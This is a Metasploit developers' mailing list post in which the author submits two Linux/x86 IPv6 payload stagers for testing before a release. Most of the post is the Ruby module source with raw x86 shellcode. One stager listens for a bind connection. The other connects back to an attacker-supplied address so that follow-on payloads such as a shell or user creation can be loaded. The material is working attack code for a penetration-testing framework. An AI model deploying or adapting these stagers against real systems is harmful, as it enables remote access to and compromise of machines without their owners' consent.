-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Hey everyone,
I've attached a couple of IPv6 stagers for Linux/x86: bind_ipv6_tcp and reverse_ipv6_tcp. They work great for me with the different payloads offered for Linux/x86 (shell, adduser, chmod, etc). They differ from their non-IPv6 brethren in the same way HD describes the use of the Windows IPv6 stagers[1]. They should be straightforward, but please try them out and lemme know if you have any issues. I'd like to commit them before 3.2 is released, but I'd like a little more testing since it's getting somewhat close :) Thanks, Kris Katterjohn [1] http://spool.metasploit.com/pipermail/framework/2008-August/003636.html -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQIVAwUBSSEsn/9K37xXYl36AQIlnQ/8ChH06D2aiABOU/brmXruNvK/tmbyRF47 mqln0xIgpKxwNxr/lS082Dgj7KdcH+4YANceSaKHwwWf9Go1N2VSe9mUS8fOh8zM 2LJtrLUbdnLoZJXic+fBDej7ggjWHRwKOqYqzB7GzHkK1JKjN//n6MK0p0bU+CIh SI0LiW5vD6Mrz2qvmHwm1rn1PNJb3/Xf5FS5+3Uv6Ia6/1QjOy5BOd+vgJQDR7nM eAHzXX6UC5crLmTnS1bZrjW/kM8uUtrDdLhSzLFCWJ3Ks+VbOHB1dJZsypmYl75U seDaFlojzMkwDhNP/cc1divLujbMHFYxfmVyvxP/6UWYdTLxd8tIGIH1wnpLQpzz pA7KePCMKEqc+ooxwTbvpyCArtqbP1xMSqqJVcHvf/sePz5Qc06alH8QTZl4V3c7 zITssP62kMJ9JMlJbBY+tpJPDVA8AbbOnTd9rnbIy/0dOpAvWDsnnMg4ZI17hFV3 264OF7cbyW7QK9EIvlWc7g9RGxz7zMbshdgqbEsgB/Jfjfz4wu3IPuirjH1/cX1+ SzCZP6k7CKLnsgZfZTPLGBYyN+bpHljm+r/Ps9T9lal9NKLryZ+BdA+x06PKYZ88 khbTSpfgJz3inyUcwGy3wty/tIfn+tltCSyhuNDahv2CWE0dkZ5wNkhohKzhMnzE 3taVk4hKYsE= =7JOp -----END PGP SIGNATURE-----
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' require 'msf/core/handler/bind_tcp' # Linux Bind TCP/IPv6 Stager module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux def self.handler_type_alias "bind_ipv6_tcp" end def initialize(info = {}) super(merge_info(info, 'Name' => 'Bind TCP Stager (IPv6)', 'Version' => '$Revision$', 'Description' => 'Listen for a connection over IPv6', 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::BindTcp, 'Stager' => { 'Offsets' => { 'LPORT' => [ 0x18, 'n' ] }, 'Payload' => "\x31\xdb\x53\x43\x53\x6a\x0a\x89\xe1\x6a\x66\x58\xcd\x80\x96" + "\x99\x52\x52\x52\x52\x52\x52\x66\x68\xbf\xbf\x66\x68\x0a\x00" + "\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x6a\x66\x58\xcd\x80\xb0" + "\x66\xb3\x04\xcd\x80\x52\x52\x56\x89\xe1\x43\xb0\x66\xcd\x80" + "\x93\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1" } )) end end
## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/projects/Framework/ ## require 'msf/core' require 'msf/core/handler/reverse_tcp' # Linux Reverse TCP/IPv6 Stager module Metasploit3 include Msf::Payload::Stager include Msf::Payload::Linux def self.handler_type_alias "reverse_ipv6_tcp" end def initialize(info = {}) super(merge_info(info, 'Name' => 'Reverse TCP Stager (IPv6)', 'Version' => '$Revision$', 'Description' => 'Connect back to attacker over IPv6', 'Author' => 'Kris Katterjohn <[EMAIL PROTECTED]>', 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, 'Handler' => Msf::Handler::ReverseTcp, 'Stager' => { 'Offsets' => { 'ADDR' => [ 0x15, 'foo' ], 'LPORT' => [ 0x2c, 'n' ], 'SCOPEID' => [ 0x11, 'V' ] }, 'Payload' => "\x31\xdb\x53\x43\x53\x6a\x0a\x89\xe1\x6a\x66\x58\xcd\x80\x96\x99" + "\x68\x00\x00\x00\x00\x68\xde\xad\xbe\xef\x68\xde\xad\xbe\xef\x68" + "\xde\xad\xbe\xef\x68\xde\xad\xbe\xef\x52\x66\x68\xbf\xbf\x66\x68" + "\x0a\x00\x89\xe1\x6a\x1c\x51\x56\x89\xe1\x43\x43\x6a\x66\x58\xcd" + "\x80\x89\xf3\xb6\x0c\xb0\x03\xcd\x80\x89\xdf\xff\xe1" } )) register_options([ OptInt.new('SCOPEID', [false, "IPv6 scope ID, for link-local addresses"]) ]) end # This isn't pretty, but then again neither are IPv6 addresses --Kris def replace_var(raw, name, offset, pack) return false unless name == 'ADDR' addr = "" substitute_vars(addr, { 'LHOST' => [ 0, 'ADDR6' ] }) repl = "" addr.unpack('V*').reverse.each do |x| repl += Rex::Arch::X86.push_dword(x) end raw[offset, repl.length] = repl true end end
_______________________________________________ Framework-Hackers mailing list Framework-Hackers@spool.metasploit.com http://spool.metasploit.com/mailman/listinfo/framework-hackers
